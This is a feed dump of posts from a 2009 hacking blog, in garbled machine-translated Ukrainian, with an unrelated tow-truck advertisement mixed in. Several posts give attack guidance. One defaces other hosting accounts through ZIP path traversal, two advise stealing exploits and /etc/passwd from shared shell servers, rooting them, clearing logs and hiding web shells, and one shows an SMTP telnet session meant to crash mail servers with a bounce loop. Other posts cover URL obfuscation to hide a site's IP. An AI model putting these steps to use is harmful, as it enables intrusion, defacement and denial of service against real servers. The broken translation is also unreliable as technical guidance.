(Edit4.Text, -1);&lt;br /&gt;If (NNMPOP31.MailCount) then ShowMessage ( 'Wrong number')&lt;br /&gt;Else&lt;br /&gt;BEGIN&lt;br /&gt;NMPOP31.GetMailMessage (N);&lt;br /&gt;Edit5.Text: = NMPOP31.MailMessage.From;&lt;br /&gt;Edit6.Text: = NMPOP31.MailMessage.Subject;&lt;br /&gt;Edit7.Text: = NMPOP31.MailMessage.MessageID;&lt;br /&gt;Memo1.Lines.Assign (NMPOP31.MailMessage.Head);&lt;br /&gt;Memo1.Lines.Assign (NMPOP31.MailMessage.Body);&lt;br /&gt;End;&lt;br /&gt;End;&lt;br /&gt;&lt;br /&gt;Після закінчення роботи потрібно відключитися від сервера, що робиться за допомогою методу Disconnect.&lt;br /&gt;&lt;br /&gt;Ну ось, в принципі, і все. Тепер ви можете з успіхом користуватися POP3 в&lt;br /&gt;Delphi.&lt;br /&gt;&lt;br /&gt;P.S. Так, я ще про чистку забомбленних скриньок говорив, так вот, лист видаляють&lt;br /&gt;за допомогою методу DeleteMailMessage (N: Integer), яке прибирає повідомлення з номером N з поштового сервера.&lt;br /&gt;&lt;a href="http://hackerzonn.blogspot.com/"&gt;Хакерство, книги хакерства, як стать хакером, взлом почтового ящика.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-8785003688841982938?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/8785003688841982938/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=8785003688841982938' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8785003688841982938'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/8785003688841982938'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/pop3-delphi.html' title='© Протокол POP3 в Delphi'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-1691442111280689402</id><published>2009-02-02T00:16:00.001-08:00</published><updated>2009-02-02T00:16:57.089-08:00</updated><title type='text'>Ховаючи IP свого сайту</title><content type='html'>Варто розмістити в Мережі інформацію, зачіпають чиї-небудь інтереси, як на адмінів сервак тут же починають кричати СВЕРХУ: "Заберіть цю хрень, поки ми зовсім вас на фиг не закрили!". Подивимося, як можна подгадить любителям наступити на горло чужій пісні, приховуючи від їхніх очей адресу своєї сторінки. Самий звичайний IP адреса можна замаскувати так, що навіть яйцеголових специ з комп'ютерної безпеки будуть довго чесать репи в тяжкой думку, расшіфровивая загогуліну вроде http://ftp:128.03.60.23 @ 3558% 3351% 3040. А що вже казати про простих смертних!&lt;br /&gt;&lt;br /&gt;Формати адреси&lt;br /&gt;Отже, кожен IP-шник складається з чотирьох байт (дорога, хочеш я тобі розповім, що таке байт?), Розділених крапками. Наприклад, сайти http://www.chat.ru/ і http://www.geocities.com/ мають адреси 212.24.32.192 і 209.01.224.18 відповідно. Що набирати в браузері: більш зручне символьне ім'я або строку http://212.24.32.192 - справа смаку кожного користувача. Останній спосіб залишає масу можливостей змінити IP своєї сторінки до невпізнання або створити ілюзію звернення зовсім на інший сервер.&lt;br /&gt;&lt;br /&gt;Шістнадцятковий трюк&lt;br /&gt;Запустимо програму Calculator зі стандартного набору Windows (хоть что-то юзабельное з виндов) і послідовно перетворимо кожен байт, що входить в адресу, в шістнадцятковому (HEX) значення. Отримаємо D4.18.20.C0 для www.chat.ru і D1.01.E0.12 для www.geocities.com. Тепер можна посилатися на свою сторінку за цим значенням, набираючи в браузері http://0xD4.0x18.0x20.0xC0. Дізнатися IP адреса стало складніше, але ще, як то кажуть, не фонтан: будь-який, хто коли-небудь бачив програми на С або Assembler, відразу здогадається, в чому тут трюк. Кращий спосіб взяти всі чотири байтів D41820C0 і перевести їх у десяткове (DEC) значення. За що одержав числа також можна посилатися на сайт з адресою www.chat.ru: http://3558351040/.&lt;br /&gt;&lt;br /&gt;Восьмерічний трюк&lt;br /&gt;Ще один варіант, зазвичай збивають з пантелику навіть матерів сісопов - перевести кожну складову IP адреси не в шістнадцятковому, а в восьмерічное (Oct) значення. Той факт, що число, що починається з 0, трактується програмами як восьмерічное, відомий далеко не всім: адреса http://0324.030.040.0300 дає бажаний результат.&lt;br /&gt;&lt;br /&gt;А скільки це буде у відсотках?&lt;br /&gt;Тепер можна поступово ускладнювати отримані адреси, додаючи нові елементи скритності. Відомо, що текстова інформація, що передається браузерами разом з URL, перед посилкою по Мережі піддається деякої обробці. Так, наприклад, всі символи Space (пробіл) замінюються кодом% 20. Те ж саме можна зробити з будь-яким символом свого адреси. Щоб отримати необхідний код цифри, достатньо додати до неї 30. % 33 буде відповідати цифрі 3, а% 30 - 0. Підправив отриманий раніше десятковий адресу. Тепер http://3558% 3351% 3040 також містить посилання на www.chat.ru, хоча виглядає вже досить устрашающе.&lt;br /&gt;&lt;br /&gt;Ось де собака порылась!&lt;br /&gt;Наступний рівень складності у благородній справі запутиванія слідів вносить додавання в URL символу @. Стара добра "собака" тут не має ніякого відношення до E-Mail, її роль - передача на сервер Login-A і пароля: якщо сервер містить запароленние каталоги, звертатися до них слід так: http://login:password @ URL. Додавання ж "собаки" до звичайного адресою, яка не має ніякого відношення до секретності, змушує браузер просто ігнорувати все, що передує символу @. Таким чином на сервер www.chat.ru ми можемо потрапити, набравши, наприклад, адреса http://12345435374683434809080 @ 3558351040 або http://ftp:128.03.60.23 @ 3558% 3351% 3040&lt;br /&gt;&lt;br /&gt;Головне правильно вибрати ім'я!&lt;br /&gt;Але й це ще не межа: заплутати переслідувачів можуть правильно обрані імена каталогів і файлів на сервері. Назвав свою сторінку 203356.htm або ftp.123.0.12.34.htm, можна збити з пантелику будь-якого: http://12345435374683434809080 @ 3558351040/ftp.123.0.12.34.htm. Нагадаємо, що обмеження на довжину назви файлу або каталогу - 256 символів, що означає можливість конструювання, наприклад, такого монструозного URL: http://12345435374683434809080 @ 3558351040/23232323239200596/3232908576579404323 /&lt;br /&gt;123.htm.&lt;br /&gt;&lt;br /&gt;Ховаючись в Рунеті&lt;br /&gt;Якщо є можливість, можна зареєструвати свій домен з ім'ям "чіслітельним", наприклад, 2323.ru або 909093290.com. У зоні RU вже зареєстровані 100.ru або 777.ru. Наплодили в такому домені "цифрових" піддоменів, можна отримати адреси на кшталт: http://121.3434.23.2323.ru/121.223.231.ru/2323.12.89.32.ru/ru.htm.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-1691442111280689402?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/1691442111280689402/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=1691442111280689402' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1691442111280689402'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1691442111280689402'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/ip.html' title='Ховаючи IP свого сайту'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-847385618542442651</id><published>2009-02-02T00:06:00.000-08:00</published><updated>2009-02-02T00:14:50.733-08:00</updated><title type='text'>евакуація автомобілів в Москві</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://vvgarant.ru/images/00012.jpg"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 400px; height: 300px;" src="http://vvgarant.ru/images/00012.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;ВВГ компанія пропонує послуги з цілодобової евакуації автомобілів в Москві. Велика кількість евакуаторів, низькі ціни.&lt;br /&gt;&lt;br /&gt; &lt;br /&gt;В дорозі може трапитися всяке, дзвінок у службу евакуації і замовлення евакуатора - це прохання про допомогу у важку хвилину.&lt;br /&gt;Саме в цю важку хвилину ми виручить Вас гарантовано!&lt;br /&gt;До Вас приїдуть досвідчені водії на нових евакуаторах японського виробництва, дбайливо занурять Ваш автомобіль, оперативно доставлять його в будь-яку точку Москви чи Росії! При навантаженні на евакуатор і подальшої евакуації авто, гарантуємо доставити Вашу машину до місця призначення в цілості й схоронності.&lt;br /&gt;&lt;a href='http://vvgarant.ru/'&gt;эвакуатор Москва&lt;/a&gt;  &lt;a href='http://vvgarant.ru/'&gt;услуги эвакуатора&lt;/a&gt;  &lt;a href='http://vvgarant.ru/'&gt;эвакуация авто&lt;/a&gt;  &lt;a href='http://vvgarant.ru/'&gt;вызов эвакуатора&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-847385618542442651?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/847385618542442651/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=847385618542442651' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/847385618542442651'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/847385618542442651'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_2924.html' title='евакуація автомобілів в Москві'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-652968149370334251</id><published>2009-02-02T00:04:00.000-08:00</published><updated>2009-02-02T00:19:28.199-08:00</updated><title type='text'>Дефейс у пров за допомогою ZIP-архіву</title><content type='html'>Ця стаття посвещается, тим хто хоче замутити свій хостинг з можливістю на ньому розпаковування ZIP-архівів, або тим хто хоче ломануть хостинг з такою можливістю ;-) У цій статті ви зможете дізнатися про одну дірку за допомогою якої можна закачувати файли і папки в чужі акаунти зі свого =)) Якщо зацікавилися, то читайте далі.&lt;br /&gt;Intro&lt;br /&gt;Усе почалося з ідеї створити чат, доступний з гостьового входу. В якості провайдера був обраний Центральний Телеграф, так як коннект з ним завжди з першого разу і дуже рульная. Даний пров дає 1 Мег під пагу, якщо купити инет карту, що ми і зробили. Далі виявилося, що CGI / ASP / PHP ЕТС. заборонені, можна юзать тільки готові скрипти (які, природно, якістю не вражають). Скрипту чату серед них, звичайно, не було, і ми вирішили заюзать під ці цілі скрипт гостьової книги або форумів. Через деякий час чат був готовий, але, після пари тижнів, було вирішено, що чат зроблений лажово - для входу потрібно зареєструватися у нас, без цього - тільки під ім'ям Guest і т.п. заморочки. Загалом, було необхідно переробляти. У ЦТ класти файли на пагу можно только если у тебя что-то є на рахунку, а у нас (так достоверно и неизвестно почему) зняли останні 15 хвилин, які лежали там спеціально для доступу до паге;). Вирішили не класти грошей на цей рахунок, а зробити все по-новому, з чистого листа, так би мовити. І зробили, все круто і зручно, тільки от встала одна проблемка - як би закинути на старий сайт index.html з посиланням на новий? Доступ-то до старого заборонений! (NivaX: Тут обмовлюся - в старому чаті накопичилося певну кількість заслужених чатлан - класні, перевірені друзі, і дуже захотілося побачити їх на новому сайті) А раз проблемка встала - впору пошукати рішення. І ми стали шукати, як би можна отримати доступ на запис у файли інших ПАГ. Все, довге і нудною Інтро закінчилося. ;)&lt;br /&gt;MAIN&lt;br /&gt;Тепер, власне, про знайденому баге. На пагі ЦТ доступ тільки через веб-інтерфейс: (, а щоб не свіхнуться, качая тучу файлу, придумана там гарна система: пакуешь файлів у ЗИП, кидали ЗИП через веб-інтерфейс, а там є така кнопка - розпакувати. Ось і прийшла ідея , що распаковщік у них, напевно, якийсь кривий-доморощений. Так і виявилося. При перевірці на вошивість було виявлено наступне:&lt;br /&gt;Якщо розпаковує файли вже існують, то вони перезаписувати без запиту;&lt;br /&gt;Архівер все розпаковує зі шляхами;&lt;br /&gt;Мало того, що з шляхами, так шляху ще й не перевіряються на наявність точок і слешей!&lt;br /&gt;Таким чином, з'явилося два способи досягнення мети. Перший, ясний перець, грунтувався на підробці шляхів - створювався каталог з ім'ям з двох символів, в ньому - каталог з ім'ям пагі, на яку передбачалося залити "оновлення":)), а в цю папку вже клали сам файл для заливки. Перший каталог пакували в ЗИП, ЗИП відкривався з HIEW или чего-нить еще, два горезвісних символу в назві папки замінялися на дві точки у всіх місцях, де були знайдені в зіпе. Другий спосіб майже такий же - створювався фото з довгим ім'ям, початок якого потім замінюється на точки і слеші. Наприклад, щоб залити index.html на пагу по імені vaspupkin, створюємо фото:!! _vaspupkin_index.html З необхідним змістом, пакуем в ЗИП, потім в HEX-редакторі змінюємо "!!" на "..", а "_" на "". Кидай, розпаковує, отримуємо результат:)). Звичайно, можна було писАть в будь-який файл, на який є право доступу на запис, але наша мета була інша. Після зміни індексу на старій паге ми заспокоїлися і откаталі пісьмецо админам, щоб пофіксено. Ось, начебто, і все про баге;)&lt;br /&gt;OuTTRo&lt;br /&gt;В общем-то, зародок цієї ідеї прийшов зі світу BBS і Fido, де ми балували підробкою шляхів у *. ZIP-пакетах, розпаковує автоматично. О, це було солодко! :)) Адже BBS і поінти часто під DOS / Windows, а там можна було поправити ім'я файлу на com1/com2 (модем завалений мегамі даних:), prn (принтер, якщо включений, звичайно:), ну і звичайно ж улюблений CON ( висновок прямо в консоль), а код 07h при виведенні в консоль - гнусный спікерний звучок;)). Потім ідея підставити визод на рівень вище в ЗИП, прийшла спочатку до NivaX'у, була виправлена і дороблена, і ось на виході результат. Ну що, допіл пиво?&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;ЗЫ: На ЦТ цей баг пофіксено після нашого листа, а от якщо знайдеш інших прово з розпаковування архіву - прапор тобі в руки;). І пам'ятай: архів - необозрімое поле діяльності!&lt;br /&gt;Шлях усунення цієї дірки: встановлювати більш свіжу версію ZIP-архіватора.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://hackerzonn.blogspot.com/"&gt;Хакерство, книги хакерства, як стать хакером, взлом почтового ящика.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-652968149370334251?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/652968149370334251/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=652968149370334251' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/652968149370334251'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/652968149370334251'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/zip.html' title='Дефейс у пров за допомогою ZIP-архіву'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-1007770071487147812</id><published>2009-02-02T00:03:00.000-08:00</published><updated>2009-02-02T00:19:54.109-08:00</updated><title type='text'>Як дістати експлоіти # 2</title><content type='html'>Ця стаття - невелике доповнення до статті nekd0 "як дістати експлоіти".&lt;br /&gt;Найголовніший облом тут може статися після того, як доступ через ftp звичайним юзером до своєї домашньої директорії виявиться заборонений, а то й зовсім FTP сервера не буде.&lt;br /&gt;Доведеться ручками лазить по директоріями, що з боку буде виглядати досить маразматічно. Можна спробувати пошукати файли за шаблоном у юзерскіх директоріях. Наприклад, за допомогою Locate і Find.&lt;br /&gt;До речі, на Шелл існує така противная штука, як таймаут, тобто якщо нічого не робиш протягом певного часу (звичайно 2-5мин.), То сервер сам розриває з тобою з'єднання, а отже, процес пошуку теж автоматично вбиває. Так що потрібно надсилати процес в бекграунд з допомогою символу &amp; наприкінці команди. Процес тоді буде працювати навіть після того, як ти вийшов з Шеллі. Але результати мають відображатися на екрані, а якщо ти вийшов, то природно, нічого не відобразиться. Отже, потрібно записувати результати у файл. На всяк випадок создешь в Хом директории какой-нибудь log.txt за допомогою команди touch log.txt. У підсумку команди повинні виглядати так:&lt;br /&gt;CD ~&lt;br /&gt;touch log.txt&lt;br /&gt;Find / Home-Name *. C&gt;&gt; ~ / log.txt &amp;&lt;br /&gt;Можна теж саме, але з допомогою Locate.&lt;br /&gt;Якщо хто не знав, Тильда - це домашня директорія.&lt;br /&gt;Але адмін може зняти атрибути з Find і Locate, тоді за запитом вони тобі будуть видавати всі файли та директорії, до яких у тебе є доступ. Файлік вийде відповідного розміру. Потім вже можеш розсортувати цей файл простим grep'ом. Отож, у підсумку цих мук ти побачиш теці з експлоітамі. Хоча це може бути і my_first_program.c, що виводять Hello, World! =). А деякі залишають тільки скомпіленние проги без исходников. Їх ти вже без всяких приколів используешь на свій страх і ризик! До речі, не недо вандальнічать в цих директоріях. Юзер адже може інколи оновлювати свою колекцію ...&lt;br /&gt;Також трапляються деякі екземпляри користувачів, які ставлять на свою директорію 700 біт, тобто доступ до папки дозволений тільки власнику. А деякі ставлять взагалі нульовою, то есть доступ заборонений для всіх. Потрапити в такі директорії - саме солодке, хоча деякі ставлять такі біти просто для прикол.&lt;br /&gt;На Шелл провайдерів, особливо на безкоштовних, лежить багато local root exploit'в, адмін на них поступово починає забивати, особливо якщо на сервак зар кілька тисяч користувачів. Рута систему всі, кому не ліньки, можеш і ти теж за компанію ... З нульовим уідом ти облазив всі папки та почернешь для себе багато корисної інформації, наприклад базу з мильнікамі. Не забудь Логи Почистіть, або просто проксі пользуйся, врядли тебе админ тоді наченет обчислювати, якщо ти ніего такого не сделал.А якщо навіть Шелл отнимут - не біда, новий зар.&lt;br /&gt;Але все було б це добре, але от якщо навіть телнета немає. Наприклад Хостер какой-нибудь. Всі собі телнет зар, а у тебе зайвих 10 баксів не знайшлося. Загалом ситуація така, що у всіх є телнет, а у тебе тільки місце під сторінку з виконанням CGI-сценаріїв. Ftp, звичайно має бути, але там вже точно доступ тільки в свою дірекуторію. Що ж, теж непогано. Можеш лазити по директорія з правами&lt;br /&gt;веб-сервера. Як? Є така штука web shell. Вона дозволяє виконувати команди через Web. Навіть якщо на директоріях користувачів коштує 700 біт, сервер туди все одно пролезет (скрипти ж йому потрібно виконувати). Повторювати всі описані вище дії, архівіруешь, зливають по вебу через проксі яким-небудь FlashGet'ом. Але учті, адмін буде не в захваті, побачивши у тебе такий сценарій ... Так що шифруються.&lt;br /&gt;Да не помітить тебе Root:)&lt;br /&gt;&lt;br /&gt;P.S. Скрипт цей дати не можу - сам шукаю ...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://hackerzonn.blogspot.com/"&gt;Хакерство, книги хакерства, як стать хакером, взлом почти.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-1007770071487147812?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/1007770071487147812/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=1007770071487147812' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1007770071487147812'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/1007770071487147812'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/2.html' title='Як дістати експлоіти # 2'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-5161169632981488614</id><published>2009-02-02T00:01:00.000-08:00</published><updated>2009-02-02T00:20:16.330-08:00</updated><title type='text'>Як дістати експлоіти.</title><content type='html'>Ось просканіл ти сервак свого кровного ворога і бачиш, що у нього стоїть на 21 порту WU-ftpd v2.6.2 (к примеру). Ти рад до втрати тому що знаєш, що цей сервак можна поиметь через FTP порт. Але де дістати експлоіт під цю вразливість? Так, раніше мене теж мучали це питання, але зараз я знаю величезна безліч способів їх дістати абсолютно безкоштовно, може бути навіть приватні отримати.&lt;br /&gt;Спосіб перший (найвідоміший): йдеш на який-небудь західний Хак-сайт і вводити в поле пошуку те, що тобі потрібно заексплойтіть. Тут тобі відразу вискакує безліч посилань, а ти вже потрудились знайти серед них те, що тобі потрібно.&lt;br /&gt;Шукати сплоіти тут: &lt;br /&gt;www.packetstormsecurity.nl&lt;br /&gt;www.hac1k.co.za&lt;br /&gt;www.sнcurityfocus.com&lt;br /&gt;www.mazzzafaka.ru&lt;br /&gt;&lt;br /&gt;Спосіб другий (менш популярний): Ти йдеш на відомі&lt;br /&gt;трейдерські канали і клянчішь там чего-нить, а може і&lt;br /&gt;сам трейд якщо є чим. Але тут треба добре по&lt;br /&gt;англійської парить, адже там тільки по англійськи&lt;br /&gt;можна.&lt;br /&gt;Заходи сюди: # darknet&lt;br /&gt;#! mafianet&lt;br /&gt;&lt;br /&gt;Спосіб передостанній: якщо ти сидиш під виндой, то тебе&lt;br /&gt;приходиться, перед тим як ломануть сервак, закачати на&lt;br /&gt;Шелл експлоіт і скомпіліть його. Дійшло? Все геніальне --&lt;br /&gt;просто. Хіба ти один такий супер хакер? Наверное кто-то&lt;br /&gt;крім тебе на Шелл теж тусуіться, чатітся, сервак кладе.&lt;br /&gt;Можна і у нього сплоітов запозичити. Береш звичайний FTP&lt;br /&gt;клієнт, налаштовувати з'єднання до Шеллі на свій акаунт,&lt;br /&gt;а потім просто ЛАЗу по директоріях і шарішь на наявність&lt;br /&gt;файлу з розширенням. C,. PL і ETC). Звичайно спосіб не дуже&lt;br /&gt;продуктивний, відсотків 70, а то і 80 всього скаченого&lt;br /&gt;виявляється сміттям, а ось решта 20 сплоітамі, причому&lt;br /&gt;реальними. Ти скажеш: як я за допомогою FTP попаду не до себе в&lt;br /&gt;діру? Дуже просто. На сервак, що надають Шеллі&lt;br /&gt;можна побачити навіть / с юідом звичайного юзверя.&lt;br /&gt;А якщо там админ че напутал, то може удасться утащила і&lt;br /&gt;ETC / passwd.&lt;br /&gt;&lt;br /&gt;Спосіб останній (самий важкий): сам напиши сплоіт.&lt;br /&gt;Не получиться? А ти пробував? Ні? Ось і спробуй!&lt;br /&gt;&lt;br /&gt;Удачи.&lt;a href="http://hackerzonn.blogspot.com/"&gt;&lt;br /&gt;Хакерство, книги хакерства, як стать хакером, взлом почти.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-5161169632981488614?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/5161169632981488614/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=5161169632981488614' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/5161169632981488614'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/5161169632981488614'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_02.html' title='Як дістати експлоіти.'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-7626811122030850987</id><published>2009-02-01T23:59:00.000-08:00</published><updated>2009-02-02T00:20:42.361-08:00</updated><title type='text'>Вішаємо сервак</title><content type='html'>Вам всем знаком протокол SMTP - для пересилання пошти. Іноді, відправляючи повідомлення на адресу і зробивши помилку, ви отримували відповідь від сервера з позначкою, що лист доставити не вдалося. Здавалося б, абсолютно нормальна річ. Але ... тут я трохи піду від пояснень принципу роботи sendmail'a і звернуся до оптичної фізики. Коли в стержні лазера утворюється Квант, летить строго паралельно оптичної осі, скажімо, рубінового стержня, то стикаючись з атомами цього стрижня Квант буде вибивати з них інші кванти, що летів строго паралельно йому. Долетить до одного дзеркала, кванти відображаються і летять назад, нарощуючи свій число в геометричній прогресу. Кванти долітали до другого дзеркала, відображаються ... процес повторюється.&lt;br /&gt;&lt;br /&gt;Коли ми відправляємо з адреси non_existent@test1.com листа на адресу non_existent@test2.com sendmail на сервері test2.com бачить, що лист не може бути прийняте (такого користувача немає і в помине) і відсилає лист обрати, додавши туди повідомлення про дату , часу помилки USER NOT FOUND. Лист повертається на домен test1.com, обростає додатковою інформацією ... процес повторюється&lt;br /&gt;&lt;br /&gt;Коли кількість квантів, що носять туди-сюди досягає критичного межі, то у пучка в сукупності набирається достатньо потужності, щоб "вискочити" за напівпрозоре дзеркало і зробити корисну роботу - пробити отвір у мікроподшіпніке або ж спалити ворожий космічний корабель.&lt;br /&gt;&lt;br /&gt;Коли об'єм листа зростає настільки, що, ходячи між test1.com і test2.com на його передачу йде левова частка наявного bandwidth'a, один з серверів не витримує навантаження і падає. Я особисто спостерігав за процесом, як пінг до одного з доменів збільшувався, збільшувався ... поки не почався суцільний timed out.&lt;br /&gt;&lt;br /&gt;У випадку електротехніки, ми маємо абревіатуру Light Amplification by the Stimulated Emission of Radiation. (Усліеніе світла в результаті вимушеного випромінювання), що і читається як LASER. У випадку IP-мереж ми маємо так само типовий лазер з робочим тілом у вигляді каналу, квантами у вигляді листа і дзеркалами в особі test1.com &amp; test2.com.Только енергія використовується не на благо партії, а на те, щоб звалити сервер. Або обидва. А тепер - сценарій у дії:&lt;br /&gt;&lt;br /&gt;$ Telnet some.mailserver.com 25&lt;br /&gt;&lt;br /&gt;220 ESMTP (Sendmail 8.8.9) Ready&lt;br /&gt;HELO www.test1.com&lt;br /&gt;250 OK&lt;br /&gt;MAIL FROM: non_existent@test1.com&lt;br /&gt;250 user non_existent OK&lt;br /&gt;RCPT TO: non_existent@test2.com&lt;br /&gt;250 reciptient non_existent OK&lt;br /&gt;DATA&lt;br /&gt;354 Send data. End with CRLF.CRLF&lt;br /&gt;blah&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;QUIT&lt;br /&gt;&lt;a href="http://hackerzonn.blogspot.com/"&gt;Хакерство, книги хакерства, як стать хакером, взлом почти.&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3396992018587873090-7626811122030850987?l=hackerzonn.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackerzonn.blogspot.com/feeds/7626811122030850987/comments/default' title='Дописати коментарі'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=3396992018587873090&amp;postID=7626811122030850987' title='0 коментарі(в)'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/7626811122030850987'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/3396992018587873090/posts/default/7626811122030850987'/><link rel='alternate' type='text/html' href='http://hackerzonn.blogspot.com/2009/02/blog-post_778.html' title='Вішаємо сервак'/><author><name>en team</name><uri>http://www.blogger.com/profile/06206779249624408587</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-3396992018587873090.post-3747557182492945551</id><published>2009-02-01T23:56:00.000-08:00</published><updated>2009-02-01T23:59:17.313-08:00</updated><title type='text'>Глюкан Вікно</title><content type='html'>Я незабаром угадай у вас є сусід, який працює на вікнах або в вашому универе або школі, буде кватирки.&lt;br /&gt;Якщо бути те, що Я думаю, що Ви цікавий погляд на реакцію удрученную, коли з винды почнуть зникати свої стандартні компоненти.&lt;br /&gt;Ви напевно знаєте такий фішку як реєстр, так що тут це відкриває нам багато можливостей в установці кватирок.&lt;br /&gt;Тиснемо Нашу улюблену кнопку Пуск знаходимо там пункт "Виконати" і пишемо 